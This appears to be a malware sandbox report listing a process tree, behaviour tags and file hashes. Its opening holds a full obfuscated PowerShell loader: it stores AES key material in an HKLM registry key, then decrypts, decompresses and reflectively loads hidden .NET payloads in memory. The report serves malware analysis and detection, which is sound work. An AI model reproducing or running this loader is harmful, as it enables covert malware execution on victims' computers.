'$TTZK.xPKxPexPyxP=[xPSxPyxPsxPtxPexPmxP.CxPoxPnxPvexPrxPtxP]:xP:xPFxProxPmBxPaxPsexP64xPSxPtrxPixPnxPg("xPhxPOxPixPbxxP/xPTxPsxPDxPUxPfxPQDxPvxPLxP4VxPDxPHxP90xPGxPfxP9kxPJCxPixPJFxPcuxPDxP8yxPAxPbxPMxPeCxP4xPWxPc=xP");'.Replace('xP', ''); Invoke-Expression -Debug '$TTZK.dkIdkVdk=dk[Sdkydksdktdkedkmdk.dkCodkndkvdkerdktdk]dk::dkFdkrdkomdkBadksdke6dk4Sdktdkridkndkg("dkBdkvdkidkt0dkjdkfdkAdkudkJdk4dk7Jdk1dkLdk6bdkOdkGdk79dkQdk=dk=");'.Replace('dk', ''); $pOIf=$TTZK.CreateDecryptor(); $TvBT=$pOIf.TransformFinalBlock($REHT, 0, $REHT.Length); $pOIf.Dispose(); $TTZK.Dispose(); $TvBT;}function MetK($REHT){ Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$RRoW=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA(,$REHT);'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$HnaT=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA;'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$OYGv=KVNKVeKVwKV-OKVbKVjKVeKVcKVtKV KVSyKVsKVtKVemKV.KVIKVO.KVCKVoKVmpKVreKVsKVsiKVonKV.KVGZKViKVpKVSKVtrKVeKVaKVm($RRoW, KV[KVIKVOKV.CKVoKVmKVpKVrKVeKVsKVsiKVoKVnKV.CKVoKVmKVprKVeKVsKVsiKVonKVMKVodKVe]KV:KV:DKVeKVcKVoKVmpKVrKVeKVssKV);'.Replace('KV', ''); $OYGv.CopyTo($HnaT); $OYGv.Dispose(); $RRoW.Dispose(); $HnaT.Dispose(); $HnaT.ToArray();}function EXHV($REHT,$EVat){ Invoke-Expression -Verbose '$gHke=DN[DNSDNyDNstDNeDNmDN.DNRDNeDNfDNleDNcDNtDNioDNnDN.DNAsDNsDNeDNmbDNlyDN]DN::DNLoDNaDNd([byte[]]$REHT);'.Replace('DN', ''); Invoke-Expression -InformationAction Ignore '$vNwL=$gHke.CAECAnCAtCAryCAPCAoCAiCAnCAtCA;'.Replace('CA', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$vNwLio.ioIioniovoiokioeio(io$ioniouiollio, $EVat);'.Replace('io', '');}function JYY($vrvS){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'MhRVQwCgfyDG;ODJpvpxTYFqN;dlOMrqSijFnyTh'; Set-ItemProperty -Path $registryPath -Name 'MhRVQwCgfyDG' -Value $vrvS; Set-ItemProperty -Path $registryPath -Name 'ODJpvpxTYFqN' -Value 'hOibx/TsDUfQDvL4VDH90Gf9kJCiJFcuD8yAbMeC4Wc='; Set-ItemProperty -Path $registryPath -Name 'dlOMrqSijFnyTh' -Value 'Bvit0jfAuJ47J1L6bOG79Q==';}$lVPp = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $lVPp;$Enkb=[System.IO.File]::ReadAllText($lVPp).Split([Environment]::NewLine);foreach ($bUJs in $Enkb) { if ($bUJs.StartsWith('WWiTL')) { $DBhl=$bUJs.Substring(5); break; }}JYY $DBhl;$vrvS=[string[]]$DBhl.Split('\');Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$opM = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Debug '$tHS = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Verbose -Debug '$Hrm = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');EXHV $opM $null;EXHV $tHS $null;EXHV $Hrm (,[string[]] (''));5⤵PID:1156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1532 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F6⤵PID:2564
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3780
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1304
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4148
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4180
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:4608
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:2660
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2312
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca1⤵PID:1460
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:3252
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:2472
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1968
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD587c29700d926d094566f97a4ca94661f
SHA1edbc46e5510447273bbaae1a5d13e6984b003594
SHA256b254694891c8c9da1394c3c469cee50f145c72582e6d1cf0045cab4e72f48e7f
SHA5120c6ba3544daa14af98f338fa24d01624f9e93f9633b2bd6b4c031f7f1ecd4265dddde4469a8b96e81d802401ec8f3ba1d0120afe53ee6fa5345f9f3f7ab94290
-
Filesize
2KB
MD5a484f41ea0ce37e0f9d39ee141819c14
SHA1508c3820097baf72a50ccbe43ece25809a131ea3
SHA2567ff97faffcd04f3791f1926081def0c937814504935d7bbc128689e1e69e8048
SHA512e658b08546b77487456603a0ca1cb80d19a9da8e72cbcf17e669434e0b54a97f31a923148fef7bd4efdaecf8800047649c29036035b9645ae2f52553c548f754
-
Filesize
1KB
MD5ba29515284decc8189efac5d4b21c2ec
SHA10bdc11c2cd1283f165416c0832efc660b20f7a8b
SHA256ff46a944a4c86a2e5e1b6f8d87727de2ec6e5f73c3b0c406cb1d916331c7e19d
SHA51290ccaf1c0753e8ffd5feda1a6f7314ee95e20eced254c1c8600796353b6e0299fdde4049e5297d45fc369e054b9d51744ad17662a76d7a1621c1c8b12d08d0ad
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7.9MB
MD5f88d18fc65296a1ed460e40a352e3045
SHA1f6d9d94da2f11d0485ca057a057a06ac492bde8c
SHA256f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f
SHA512f193edd5c475040928e188b756d27ecb2f61ef6a1d7392bdb62e6d5bcdd5c37272849a298e9cc6265b5f67890881971ecf28f93e98edd90f6f536190999ed367